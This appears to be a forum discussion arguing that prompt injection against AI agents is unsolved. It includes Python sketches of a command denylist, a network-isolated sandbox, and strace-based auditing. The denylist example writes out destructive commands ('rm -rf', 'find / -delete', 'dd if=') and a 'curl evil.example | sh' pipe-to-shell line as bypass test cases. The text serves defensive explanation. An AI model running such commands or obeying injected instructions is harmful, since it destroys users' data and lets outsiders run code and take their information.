It's very simple: prompt injection is a completely unsolved problem. As things currently stand, the only fix is to avoid the lethal trifecta.
Unfortunately, people really, really want to do things involving the lethal trifecta. They want to give a bot control over a computer, with the ability to read and send email on their behalf. They want it to browse the web for research while helping them write proprietary code. But you can't safely do that. So if you're a massively overvalued AI company, what do you do?
You could say: sorry, I know you want to do these things, but it's super dangerous, so don't. You could say: we'll give you these tools, but be aware that the agent is likely to steal all your data. But neither of those is an attractive option. So instead they just sort of pretend it's not a big deal. Prompt injection? That's OK, we train our models to resist those attacks. 92% safe sounds like a good number, as long as you don't think about what it means, right? Please give us your money now.
For a specific bad thing like "rm -rf", that may be plausible, but the approach breaks down when you try to enumerate every other bad thing the agent could possibly do.
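To make that concrete, here's a minimal sketch of what that denylist approach looks like (the blocked list and commands are illustrative), and why enumeration can't keep up:

    # Sketch of the denylist approach; the blocked list is illustrative.
    BLOCKED = ["rm -rf", "mkfs", "dd if="]

    def is_safe(command: str) -> bool:
        # Substring match against known-bad commands.
        return not any(bad in command for bad in BLOCKED)

    assert not is_safe("rm -rf /home/user")    # catches the obvious case
    assert is_safe("rm -fr /")                 # same flags, different order
    assert is_safe("find / -delete")           # different tool, same effect
    assert is_safe("curl evil.example | sh")   # payload nobody enumerated

Every bypass is one rephrasing away, and an attacker who controls the prompt gets unlimited retries.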
We can, but if you want to stop private info from being leaked, your only sure options are to cut the agent off from the outside world entirely, or to never give it any private info in the first place.
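The "no outside communication" option is at least enforceable. A sketch on Linux, assuming util-linux's unshare and unprivileged user namespaces are available; the command being run is just an example:

    import subprocess

    # Run the agent's tool call inside a fresh, empty network namespace:
    # no routes, no DNS, nothing to exfiltrate over.
    def run_without_egress(argv: list[str]) -> subprocess.CompletedProcess:
        # -r maps the current user to root inside the namespace (no real
        # privileges); -n creates the new, empty network namespace.
        return subprocess.run(["unshare", "-r", "-n", *argv],
                              capture_output=True, text=True)

    result = run_without_egress(["curl", "-s", "https://example.com"])
    print(result.returncode)  # non-zero: the request has nowhere to go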
And? If your LLM is controlling user-mode software, you can still easily capture and audit everything from the kernel's perspective: sandboxing, event tracing, and so on.
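For example, roughly (assuming strace is installed; the traced command is illustrative):

    import subprocess

    # Trace an untrusted command from the kernel's side: log every exec
    # and every network syscall it and its children make, regardless of
    # what the model believed it was doing.
    def audited_run(argv: list[str], log_path: str = "audit.log") -> int:
        trace = ["strace", "-f",                       # follow forks
                 "-e", "trace=execve,connect,sendto",  # syscalls of interest
                 "-o", log_path, *argv]
        return subprocess.run(trace).returncode

    audited_run(["sh", "-c", "echo hello"])
    # audit.log now records every process spawned and every address contacted.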
No need to "ask" for "proof". You can monitor the system in real time, detect malicious or potentially harmful activity, and stop it early, using the same techniques security tooling has relied on for decades.
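A toy version of "stop it early", using strace as the event source (real systems would use seccomp, eBPF, or EDR hooks in-kernel; the forbidden patterns are illustrative):

    import os, signal, subprocess

    FORBIDDEN = ["connect(", "sendto("]  # any outbound network attempt

    def run_with_tripwire(argv: list[str]) -> None:
        # strace writes syscall events to stderr as they happen.
        proc = subprocess.Popen(
            ["strace", "-f", "-e", "trace=connect,sendto,execve", *argv],
            stderr=subprocess.PIPE, text=True, start_new_session=True)
        for line in proc.stderr:
            if any(pat in line for pat in FORBIDDEN):
                # Kill the whole process group the moment we see it.
                os.killpg(proc.pid, signal.SIGKILL)
                print("killed on:", line.strip())
                return
        proc.wait()

The catch, of course, is that detection only works for behavior you can describe in advance, which is the enumeration problem all over again.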